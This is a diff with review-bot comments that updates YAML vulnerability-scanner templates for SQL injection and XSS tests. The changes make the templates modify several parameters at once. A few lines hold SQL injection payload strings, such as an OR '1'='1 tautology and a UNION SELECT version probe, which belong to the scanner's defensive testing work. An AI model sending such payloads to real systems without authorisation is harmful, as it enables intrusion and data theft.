-86,7 +86,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey wordLists: paymentPayloads: - "12345' OR '1'='1 --" 
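Review bot: NoSQLiErrorBasedQueryParamMongoose.yml gets `extractMultiple: changed_query_key` in its filter but no matching change in `execute`, unlike every other template in this commit, where the modify step is rewritten to the `${...}` key form with `for_each_combination: true`. The `execute` section is outside the diff, so this is inferred. If it still uses the bare `changed_query_key:` form, the template may keep modifying a single parameter, or fail to resolve the key at all, while its filter now reports several. I would check that section and either update it to `${changed_query_key}: ...` with `for_each_combination: true` or leave the filter on `extract`. RemoveXSRFToken.yml has the same one-sided change for `xsrfHeaderKey`.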
@@ -119,7 +119,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${paymentPayloads} + ${userKey}: ${paymentPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -169,7 +170,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -220,7 +222,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/PaymentGatewaySQLInjectionSQLite.yml b/Broken-User-Authentication/PaymentGatewaySQLInjectionSQLite.yml index cc2a43c9d..09c13a273 100644 --- a/Broken-User-Authentication/PaymentGatewaySQLInjectionSQLite.yml +++ b/Broken-User-Authentication/PaymentGatewaySQLInjectionSQLite.yml @@ -86,7 +86,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey wordLists: paymentPayloads: - "12345' UNION SELECT NULL, sqlite_version(), NULL --" @@ -119,7 +119,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${paymentPayloads} + ${userKey}: ${paymentPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -170,7 +171,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -221,7 +223,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/PaymentGatewaySQLiMySQLDBGET.yml b/Broken-User-Authentication/PaymentGatewaySQLiMySQLDBGET.yml index 31998fa95..cf16bbdf5 100644 
--- a/Broken-User-Authentication/PaymentGatewaySQLiMySQLDBGET.yml +++ b/Broken-User-Authentication/PaymentGatewaySQLiMySQLDBGET.yml @@ -93,7 +93,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey wordLists: paymentPayloads: - "12345' OR '1'='1 --" @@ -128,7 +128,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${paymentPayloads} + ${userKey}: ${paymentPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -177,7 +178,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -226,7 +228,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/PaymentGatewaySQLiSQLiteGET.yml b/Broken-User-Authentication/PaymentGatewaySQLiSQLiteGET.yml index 523bc6e4a..a2475e1d4 100644 --- a/Broken-User-Authentication/PaymentGatewaySQLiSQLiteGET.yml +++ b/Broken-User-Authentication/PaymentGatewaySQLiSQLiteGET.yml @@ -86,7 +86,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey wordLists: paymentPayloads: - "12345' UNION SELECT NULL, sqlite_version(), NULL --" @@ -119,7 +119,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${paymentPayloads} + ${userKey}: ${paymentPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -170,7 +171,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 
@@ -221,7 +223,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${paymentNegativePayloads} + ${userKey}: ${paymentNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/RemoveXSRFToken.yml b/Broken-User-Authentication/RemoveXSRFToken.yml index d3877c410..f31ef9f95 100644 --- a/Broken-User-Authentication/RemoveXSRFToken.yml +++ b/Broken-User-Authentication/RemoveXSRFToken.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: "(?i)xsrf" - extract: xsrfHeaderKey + extractMultiple: xsrfHeaderKey method: not_contains: diff --git a/Broken-User-Authentication/SQLInjectionCookieHeader.yml b/Broken-User-Authentication/SQLInjectionCookieHeader.yml index b0ee978ff..cf9414481 100644 --- a/Broken-User-Authentication/SQLInjectionCookieHeader.yml +++ b/Broken-User-Authentication/SQLInjectionCookieHeader.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: "^Cookie$|^cookie$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -92,8 +92,9 @@ execute: requests: - req: - modify_header: - userKey: ${userVal}${cookieHeaderPayloads} + ${userKey}: ${userVal}${cookieHeaderPayloads} + for_each_combination: true validate: or: - response_payload: diff --git a/Broken-User-Authentication/SQLiErrorBasedParamAppendPayloadMSSQL.yml b/Broken-User-Authentication/SQLiErrorBasedParamAppendPayloadMSSQL.yml index 5cf2d8e65..bb9ac25c8 100644 --- a/Broken-User-Authentication/SQLiErrorBasedParamAppendPayloadMSSQL.yml +++ b/Broken-User-Authentication/SQLiErrorBasedParamAppendPayloadMSSQL.yml @@ -47,14 +47,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value 
@@ -72,9 +72,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${changed_body_value}${specialCharacters} + ${changed_body_key}: ${changed_body_value}${specialCharacters} + for_each_combination: true - modify_query_param: - changed_query_key: ${changed_query_value}${specialCharacters} + ${changed_query_key}: ${changed_query_value}${specialCharacters} + for_each_combination: true validate: and: - response_payload: diff --git a/Broken-User-Authentication/SQLiErrorBasedParamAppendPayloadOracle.yml b/Broken-User-Authentication/SQLiErrorBasedParamAppendPayloadOracle.yml index 23daf7550..dd6fcd8ef 100644 --- a/Broken-User-Authentication/SQLiErrorBasedParamAppendPayloadOracle.yml +++ b/Broken-User-Authentication/SQLiErrorBasedParamAppendPayloadOracle.yml @@ -47,14 +47,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -72,9 +72,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${changed_body_value}${specialCharacters} + ${changed_body_key}: ${changed_body_value}${specialCharacters} + for_each_combination: true - modify_query_param: - changed_query_key: ${changed_query_value}${specialCharacters} + ${changed_query_key}: ${changed_query_value}${specialCharacters} + for_each_combination: true validate: and: - response_payload: diff --git a/Broken-User-Authentication/SQLiErrorBasedParamMSSQL.yml b/Broken-User-Authentication/SQLiErrorBasedParamMSSQL.yml index c273b96be..e64c46463 100644 --- a/Broken-User-Authentication/SQLiErrorBasedParamMSSQL.yml +++ b/Broken-User-Authentication/SQLiErrorBasedParamMSSQL.yml 
@@ -47,12 +47,12 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key wordLists: specialCharacters: - "'" @@ -67,9 +67,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialCharacters} + ${changed_body_key}: ${specialCharacters} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialCharacters} + ${changed_query_key}: ${specialCharacters} + for_each_combination: true validate: and: - response_payload: diff --git a/Broken-User-Authentication/SQLiErrorBasedParamSQLite.yml b/Broken-User-Authentication/SQLiErrorBasedParamSQLite.yml index 830211780..837a35fc5 100644 --- a/Broken-User-Authentication/SQLiErrorBasedParamSQLite.yml +++ b/Broken-User-Authentication/SQLiErrorBasedParamSQLite.yml @@ -47,12 +47,12 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key wordLists: specialCharacters: - "'" @@ -67,9 +67,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialCharacters} + ${changed_body_key}: ${specialCharacters} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialCharacters} + ${changed_query_key}: ${specialCharacters} + for_each_combination: true validate: and: - response_payload: diff --git a/Broken-User-Authentication/SecondOrderSQLiXSS.yml b/Broken-User-Authentication/SecondOrderSQLiXSS.yml index 34bbf7319..aa4176e84 100644 --- a/Broken-User-Authentication/SecondOrderSQLiXSS.yml +++ b/Broken-User-Authentication/SecondOrderSQLiXSS.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: 
@@ -92,7 +92,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${secondOrderXSSPayloads} + ${userKey}: ${userVal}${secondOrderXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -141,7 +142,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${secondOrderXSSNegativePayloads} + ${userKey}: ${secondOrderXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -190,7 +192,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${secondOrderXSSNegativePayloads} + ${userKey}: ${secondOrderXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/SecondOrderSQLiXSSGET.yml b/Broken-User-Authentication/SecondOrderSQLiXSSGET.yml index 6606bf1c8..d4e3beaf6 100644 --- a/Broken-User-Authentication/SecondOrderSQLiXSSGET.yml +++ b/Broken-User-Authentication/SecondOrderSQLiXSSGET.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -92,7 +92,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${secondOrderXSSPayloads} + ${userKey}: ${userVal}${secondOrderXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -141,7 +142,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${secondOrderXSSNegativePayloads} + ${userKey}: ${secondOrderXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -190,7 +192,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${secondOrderXSSNegativePayloads} + ${userKey}: ${secondOrderXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/StoredSQLiXSS.yml b/Broken-User-Authentication/StoredSQLiXSS.yml index 0f25c16a7..15d8e4772 100644 --- a/Broken-User-Authentication/StoredSQLiXSS.yml 
+++ b/Broken-User-Authentication/StoredSQLiXSS.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -96,7 +96,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${storedXSSPayloads} + ${userKey}: ${userVal}${storedXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -146,7 +147,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${storedXSSNegativePayloads} + ${userKey}: ${storedXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -198,7 +200,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${storedXSSNegativePayloads} + ${userKey}: ${storedXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/StoredSQLiXSSGET.yml b/Broken-User-Authentication/StoredSQLiXSSGET.yml index 725a08e99..e61d3388f 100644 --- a/Broken-User-Authentication/StoredSQLiXSSGET.yml +++ b/Broken-User-Authentication/StoredSQLiXSSGET.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -96,7 +96,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${storedXSSPayloads} + ${userKey}: ${userVal}${storedXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -146,7 +147,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${storedXSSNegativePayloads} + ${userKey}: ${storedXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -198,7 +200,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${storedXSSNegativePayloads} + ${userKey}: ${storedXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 
diff --git a/Broken-User-Authentication/TimeBasedMySQLi.yml b/Broken-User-Authentication/TimeBasedMySQLi.yml index e357ae153..bc0d2bcd7 100644 --- a/Broken-User-Authentication/TimeBasedMySQLi.yml +++ b/Broken-User-Authentication/TimeBasedMySQLi.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -137,7 +137,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/TimeBasedMySQLiPOST.yml b/Broken-User-Authentication/TimeBasedMySQLiPOST.yml index 0e835e96f..46f33ac1a 100644 --- a/Broken-User-Authentication/TimeBasedMySQLiPOST.yml +++ b/Broken-User-Authentication/TimeBasedMySQLiPOST.yml @@ -71,7 +71,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -128,7 +128,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/TimeBasedPostgreSQLi.yml b/Broken-User-Authentication/TimeBasedPostgreSQLi.yml index 93c47f24f..aaa6b8a05 100644 --- a/Broken-User-Authentication/TimeBasedPostgreSQLi.yml 
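Review bot: The key regex in `TimeBasedMySQLi.yml` leaves `username` and `email` unanchored while every other alternative is written as `^…$`, and `^client_id$` is listed twice. This had limited effect while a single key was extracted, but with `extractMultiple: userKey` every key that merely contains one of those substrings (a constructed example: `email_verified`) is presumably selected and rewritten as well. If exact names are intended, use `^username$` and `^email$` and drop the duplicate; if substring matching is intended, a comment saying so would help the next reader. The same regex is repeated in the TimeBasedPostgreSQLi, TimeBasedSQLiSQLiteDB, TimeBasedSQLiwithXSS and login-endpoint Union templates.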
+++ b/Broken-User-Authentication/TimeBasedPostgreSQLi.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -137,7 +137,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/TimeBasedPostgreSQLiGET.yml b/Broken-User-Authentication/TimeBasedPostgreSQLiGET.yml index cfb7ef412..181cc7f62 100644 --- a/Broken-User-Authentication/TimeBasedPostgreSQLiGET.yml +++ b/Broken-User-Authentication/TimeBasedPostgreSQLiGET.yml @@ -71,7 +71,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -130,7 +130,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/TimeBasedSQLiSQLiteDB.yml b/Broken-User-Authentication/TimeBasedSQLiSQLiteDB.yml index 3295c56a3..bd2ce329f 100644 --- a/Broken-User-Authentication/TimeBasedSQLiSQLiteDB.yml +++ b/Broken-User-Authentication/TimeBasedSQLiSQLiteDB.yml 
@@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -137,7 +137,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/TimeBasedSQLiSQLiteDBPOST.yml b/Broken-User-Authentication/TimeBasedSQLiSQLiteDBPOST.yml index 367164f60..71b5c9eea 100644 --- a/Broken-User-Authentication/TimeBasedSQLiSQLiteDBPOST.yml +++ b/Broken-User-Authentication/TimeBasedSQLiSQLiteDBPOST.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -129,7 +129,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/TimeBasedSQLiXSSGET.yml b/Broken-User-Authentication/TimeBasedSQLiXSSGET.yml index 13d2125a4..5b95a15f2 100644 --- a/Broken-User-Authentication/TimeBasedSQLiXSSGET.yml +++ b/Broken-User-Authentication/TimeBasedSQLiXSSGET.yml @@ -71,7 +71,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: 
@@ -131,7 +131,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/TimeBasedSQLiwithXSS.yml b/Broken-User-Authentication/TimeBasedSQLiwithXSS.yml index ecaa33c66..b226d11ac 100644 --- a/Broken-User-Authentication/TimeBasedSQLiwithXSS.yml +++ b/Broken-User-Authentication/TimeBasedSQLiwithXSS.yml @@ -79,7 +79,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -139,7 +139,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/TimeBasedSQLiwithXSSPOST.yml b/Broken-User-Authentication/TimeBasedSQLiwithXSSPOST.yml index 26256ecd4..1e1f9420d 100644 --- a/Broken-User-Authentication/TimeBasedSQLiwithXSSPOST.yml +++ b/Broken-User-Authentication/TimeBasedSQLiwithXSSPOST.yml @@ -71,7 +71,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -131,7 +131,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 
diff --git a/Broken-User-Authentication/UnionBasedMySQLiEnforceCommentPOST.yml b/Broken-User-Authentication/UnionBasedMySQLiEnforceCommentPOST.yml index 9f776c8b0..6d3482df7 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiEnforceCommentPOST.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiEnforceCommentPOST.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -154,7 +155,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -206,7 +208,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedMySQLiEnforcingCommentPayloadOnLoginEndpoint.yml b/Broken-User-Authentication/UnionBasedMySQLiEnforcingCommentPayloadOnLoginEndpoint.yml index 82fc16582..7b65c156a 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiEnforcingCommentPayloadOnLoginEndpoint.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiEnforcingCommentPayloadOnLoginEndpoint.yml 
@@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -111,7 +111,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -162,7 +163,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -214,7 +216,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedMySQLiSubQueryExtractPasswordPayloadOnLoginEndpoint.yml b/Broken-User-Authentication/UnionBasedMySQLiSubQueryExtractPasswordPayloadOnLoginEndpoint.yml index add94b536..84488face 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiSubQueryExtractPasswordPayloadOnLoginEndpoint.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiSubQueryExtractPasswordPayloadOnLoginEndpoint.yml 
@@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -112,7 +112,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -158,7 +159,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -205,7 +207,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedMySQLiSubQueryExtractUsernamePayloadOnLoginEndpoint.yml b/Broken-User-Authentication/UnionBasedMySQLiSubQueryExtractUsernamePayloadOnLoginEndpoint.yml index acb95a0a8..66ecb7740 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiSubQueryExtractUsernamePayloadOnLoginEndpoint.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiSubQueryExtractUsernamePayloadOnLoginEndpoint.yml 
@@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -112,7 +112,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -158,7 +159,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -205,7 +207,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractPasswordPayloadGET.yml b/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractPasswordPayloadGET.yml index 4764cb9e4..aad8984cf 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractPasswordPayloadGET.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractPasswordPayloadGET.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: 
@@ -104,7 +104,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -150,7 +151,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -197,7 +199,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractPasswordPayloadPOST.yml b/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractPasswordPayloadPOST.yml index fe68acbfc..d05e634d1 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractPasswordPayloadPOST.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractPasswordPayloadPOST.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -104,7 +104,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 